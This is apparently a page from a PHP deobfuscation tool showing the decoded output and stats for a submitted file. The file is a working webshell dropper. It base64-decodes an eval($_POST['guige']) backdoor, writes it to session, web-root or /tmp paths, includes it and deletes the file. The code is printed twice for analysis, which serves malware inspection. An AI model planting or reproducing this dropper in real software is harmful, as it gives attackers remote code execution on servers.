Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $cfg_ml='PD9waHAgQGV2YWwoJF9QT1NUWydndWlnZSddKT8+'; /*<?php @eval($_POST..
Decoded Output download
<?php
$cfg_ml='PD9waHAgQGV2YWwoJF9QT1NUWydndWlnZSddKT8+';
/*<?php @eval($_POST['guige'])?>*/
$cfg_ml = base64_decode($cfg_ml);
$t = md5(mt_rand(1,100));
//WEBSHELL
$f=$_SERVER['DOCUMENT_ROOT'].'/data/sessions/sess_'.$t;
@file_put_contents($f,$cfg_ml);
if(!file_exists($f))
{
$f=$t;
@file_put_contents($f,$cfg_ml);
}
if(!file_exists($f))
{
$f=$_SERVER['DOCUMENT_ROOT'].'/a/'.$t;
@file_put_contents($f,$cfg_ml);
}
if(!file_exists($f))
{
//WEBSHELL
$f=$_SERVER['DOCUMENT_ROOT'].'/'.$t;
@file_put_contents($f,$cfg_ml);
}
if(!file_exists($f))
{
$f='/tmp/'.$t;
@file_put_contents($f,$cfg_ml);
}
//includeWEBSHELL
@include($f);
@unlink($f);
?>Did this file decode correctly?
Original Code
<?php
$cfg_ml='PD9waHAgQGV2YWwoJF9QT1NUWydndWlnZSddKT8+';
/*<?php @eval($_POST['guige'])?>*/
$cfg_ml = base64_decode($cfg_ml);
$t = md5(mt_rand(1,100));
//WEBSHELL
$f=$_SERVER['DOCUMENT_ROOT'].'/data/sessions/sess_'.$t;
@file_put_contents($f,$cfg_ml);
if(!file_exists($f))
{
$f=$t;
@file_put_contents($f,$cfg_ml);
}
if(!file_exists($f))
{
$f=$_SERVER['DOCUMENT_ROOT'].'/a/'.$t;
@file_put_contents($f,$cfg_ml);
}
if(!file_exists($f))
{
//WEBSHELL
$f=$_SERVER['DOCUMENT_ROOT'].'/'.$t;
@file_put_contents($f,$cfg_ml);
}
if(!file_exists($f))
{
$f='/tmp/'.$t;
@file_put_contents($f,$cfg_ml);
}
//includeWEBSHELL
@include($f);
@unlink($f);
?>Function Calls
| mt_rand | 1 |
| base64_decode | 1 |
Stats
| MD5 | b7fb0c02539337edf9958edaa5059a8d |
| Eval Count | 0 |
| Decode Time | 88 ms |